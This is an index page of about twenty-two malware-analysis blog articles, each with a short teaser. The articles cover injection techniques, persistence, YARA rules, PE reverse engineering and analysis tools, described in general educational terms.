Malware Analysis Articles (22)

Malware Classification

What are the different types of malware? A Guide to Malware Classification.

The Working Environment of Popular Debuggers and Disassemblers

In a previous article we discussed the basic concepts of debuggers and disassemblers. We will now take a look at the working environment of popular debugging and dissassembling applications.

Introduction to Debuggers and Disassemblers

Reverse Engineering (RE) has been the leading technique for understanding the structure and operation of malicious programs and what they’re programmed to do for a very long time.

Tools to get you Started in Malware Analysis

In this blog post, we will discuss a few additional extremely useful analysis tools. Please note that this is not an exhaustive list of the best available tools, but rather a starting point.

Identifying Malware Persistance

This article will discuss the most prevalent persistent techniques employed by malware.

What is fileless malware?

Fileless malware is a type of malware that does not rely on traditional executable files to infect a system. Instead, fileless malware uses existing system files and resources to infect a system and carry out its malicious activity. Fileless malware typically uses scripting languages like PowerShell or VBScript to execute malicious code. The malware code is injected directly into system memory, evading detection by traditional security solutions that focus on scanning files on disk.

Malware Injection Techniques: API hooking techniques

The API hooking technique (which is based on process injection) is utilized by adversaries in order to modify the input or output of Windows API calls. Use cases include stealing passwords, preventing the loading of security tools, hijacking network connections, logging keystrokes, and hiding processes and files.

Malware Injection Techniques: AtomBombing, EWMI, NtTestAlert

AtomBombing is a malware injection technique that inserts malicious code into legitimate process threads. This technique is often used by attackers to gain persistence on a system or to elevate privileges. The code that is injected into the thread can be executed when the thread is scheduled, which allows the attacker to execute their code without needing to create a new process.

Malware Injection Techniques: APC injection

APC injection is a type of malware that inserts code into a process by using the system’s asynchronous procedure call (APC) queue. This type of malware is difficult to detect because it doesn’t create any new processes or files. Instead, it modifies existing ones. APC injection can be used to install other types of malware, such as keyloggers and remote access tools. It can also be used to disable security features, such as antivirus software.

Malware Injection Techniques: Thread Execution Hijacking and SetWindowsHookEx

We continue to review the various methods of code injection!

Malware Injection Techniques: Process Hollowing

Process hollowing is a process of running a new process in the address space of a preexisting process. Process hollowing has been used by malware to masquerade their code as legitimate processes. When the legitimate process is hollowed, the malware code is injected into the new process and executed. The malware can then use the existing process’ permissions to perform malicious actions on the system.

Malware Injection Techniques: Introduction

Malware use process injection as an evasion method. It includes executing custom code within the address space of another process to achieve stealth and, in certain situations, persistence.

Windows Internals: Processes

Before we begin anything connected to malware execution, let’s delve into the Windows System Internals and grasp the basic components of a process and the system on which we will conduct our investigations and analyses. Understanding how to trace and monitor suspicious processes in your restricted environment is crucial.

Introduction to Behavior Analysis Techniques

In this series of blog posts, we will examine several aspects of dynamic malware analysis. We will examine the behavior of malware and why it must be dynamically analyzed, the various dynamic analysis methodologies, and their advantages and cons. and negative aspects of each method, technique, and tool.

Fuzzy Hashing, Import Hashing and Section Hashing

In the last post looked at a variety of methods for tracking and recognizing malware samples, including hashes, fuzzy hashes, and even developing YARA rules. However, threat actors are constantly changing their signatures, making it difficult for us to recognize their approaches and tactics.

Introduction to YARA Rules - Part 2

Let’s continue our acquaintance with YARA rules!

Introduction to YARA Rules - Part 1

There has been a lot of research done over the years to increase detection skills, and researchers have managed to come up with a lot of novel detection methods and methodologies. Each one has its own set of advantages and disadvantages. As a result, we can’t claim that we’ll choose one over the other when it comes to detection. Some are better suited to one task but not to another. In many businesses, a hybrid solution will be implemented in this manner.

Identifying Obfuscated Malware

The use of “obfuscation” is one of the strategies used by threat actors to hide their malware, avoid detection, and prevent investigation. The goal is to change the code in such a way that it becomes more difficult to understand while maintaining the program’s functioning. The structure, the way the code is written, or the use of encoding/encryption are all examples of modifications.

Reverse Engineering Portable Executables (PE) - Part 2

The PE file format is a data structure that is used by Microsoft Windows programs. It is a container for all the information that is needed by the program. This includes the code, data, and resources. The file format is also used by other operating systems, but the Windows version is the most common. For example, the Portable Executable (PE) file format is used for executables and dynamic-link libraries (DLLs).

Reverse Engineering Portable Executables (PE) - Part 1

While contemplating malware investigation, one of the most significant subjects to find out more about is understanding the Portable Executable (PE) file design.

Introduction to Static Code Analysis for Malware Reverse Engineering

Static code analysis is the process of analyzing a program’s source code without executing it. This can be useful for malware reverse engineering, because it can help to identify malicious code without running it and potentially infecting the analyst’s system. Static code analysis can be performed manually or using automated tools.

Becoming a Malware Analyst

You have been using the free trial version of a tool called My Photo Editor for your image editing activities. However, the trial period has ended and a licence has to be purchased from the website to continue using the software.